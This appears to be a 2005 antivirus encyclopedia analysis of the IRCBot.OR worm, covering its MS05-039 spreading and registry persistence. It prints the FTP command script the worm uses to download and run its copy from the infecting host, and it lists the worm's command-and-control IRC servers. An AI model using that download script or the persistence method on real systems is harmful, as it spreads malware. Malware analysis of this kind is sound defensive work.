IRCBot.OR is a 51326 byte worm that exploits a PnP vulnerability to infiltrate its host. The worm is runtime protected by Yoda and packed by UPX. On Windows 2000 systems the worm replicates and installs a bot as a payload. On other 32-bit systems the malware does not replicate but the bot is fully functional.

Upon execution, the worm copies itself into the "%System%\wbev" folder as "windrg32.exe". If the "wbev" folder does not exist the worm will create it. The worm deletes the original file after a successful copy process.

Note: If the folder "wbev" doesn't exist the worm creates it.

The worm creates a mutex "windrg322" to avoid multiple running instances of itself on one machine.

The worm adds the following registry key to the registry to make sure that it runs every time windows is started:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"WinDrg32" = "%System%\wbev\windrg32.exe"

The worm generates random IP addresses and attempts to connect on port 445 of the generated IP's to exploit the Plug and Play buffer overflow vulnerability [see MS05-039 at http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx]. If the vulnerability exploit is successful, it executes code (shellcode) on the target machine, which instructs it to connect back to the source in order to retrieve a copy of the worm. This copy is downloaded to the target machine by the created FTP Server-Connection using FTP Commands in a file called "inst".). The worm creates its own task for this purpose. The "inst" file contains the following ftp commands:

open %IP% %TCP port%
a
b
bin
get run{number}.exe
bye

The worm executes FTP.EXE locally on the compromised system to retrieve a copy of the Win32/IRCBot.OR with the name "run{number}.exe " and starts this file after downloading.
{Number} represents a numeric character.

The worm enumerates the following folders and tries to delete these files if they are
present there:

%SYSTEM%\pnpsrv.exe
%SYSTEM%\winpnp.exe
%SYSTEM%\csm.exe
%SYSTEM%\botzor.exe

And

%PROGRAMFILES%\MyWebSearch
%PROGRAMFILES%\MyWebSearch\*.exe
%PROGRAMFILES%\Hotbar
%PROGRAMFILES%\Hotbar\*.exe
%PROGRAMFILES%\MyWay
%PROGRAMFILES%\MyWay\*.exe
%PROGRAMFILES%\180Solutions
%PROGRAMFILES%\180Solutions\*.exe
%PROGRAMFILES%\Common Files\WinTools
%PROGRAMFILES%\Common Files\WinTools\*.exe
%PROGRAMFILES%\Toolbar
%PROGRAMFILES%\Toolbar\*.exe
%PROGRAMFILES%\CxtPls
%PROGRAMFILES%\NavExcel
%PROGRAMFILES%\AutoUpdate
%PROGRAMFILES%\AutoUpdate\AutoUpdate.exe
%PROGRAMFILES%\EbatesMoeMoneyMaker
%PROGRAMFILES%\eZula
%PROGRAMFILES%\eZula\mmod.exe
%PROGRAMFILES%\Common Files\GMT
%PROGRAMFILES%\Common Files\GMT\GMT.exe
%PROGRAMFILES%\Common Files\CMEII

The worm scans the registry locations HKLM\Software\Microsoft\Windows\Run, and HKLM\Software\Microsoft\Windows\RunOnce for the following keys:

"Windows PNP Server"
"Windows PNP"
"csm Win Updates"
"MyWebSearch"
"WINDOWS SYSTEM"
"Zotob"
"MyWay"
"WeatherOnTray"
"Apropos"
"IBIS TB"
"TBPS"
"Toolbar"
"Hotbar"
"CMESys"
"NavExcel"
"ViewMgr"
"eZula"
"EbatesMoeMoneyMaker"
"Ebates"
"AutoUpdater"
"Gator"
"Trickler"
"QuickTime"
"GatorDownloader"
"eZmmod"
"Viewpoint"
"TkBellExe"
"180"
"WinTools"
"Real"
"QuickTime Task"
"sais"
"msbb"
"saie"
"180ax"
"lgbibsn"
"tov"

All matching keys from these locations are deleted to prevent other malicious files from running on start up. Previous Mytob and Zotob variants watch the registry and recreate deleted the keys. To prevent this behaviour the worm tries to terminate the following processes if present:

pnpsrv.exe, winpnp.exe, csm.exe, EbatesMoeMoneyMaker*.exe, botzor.exe CxtPls.exe,
NHUpdater.exe, ViewMgr.exe, realsched.exe,qttask.exe, CMESys.exe

The worm also provides IRC-Backdoor functionality with the following functions:

Downloading files
Downloading new worm updates
Executing files
Providing uptime information to the remote controller
Providing information about the worm variant to the remote controller
Notifying IRC Channels/Operator via private message
Restarting the computer
Providing FTP Server Access on the compromised system
Removing components
Google via special Bot Plugin
Reading, sending of emails via www.mailinator.com

IRCBot.OR also makes use of the tinyurl.com functionality and to determine Internet status it .tries to connect to the following internet servers:

www.google.com
www.ebay.com
www.yahoo.com

It also tries to connect to the following irc servers:

xaeti.m00p.org
db23a.hack-syndicate.org
spookystreet.m00p.org
spookystreet.udp-flood.com

References:

http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx

History: Analysis and Write-up by: Michael St. Neitzel

© 1992-2005 Eset All rights reserved. No part of this Encyclopedia may be reproduced, transmitted or used in any other way in any form or by any means without the prior permission.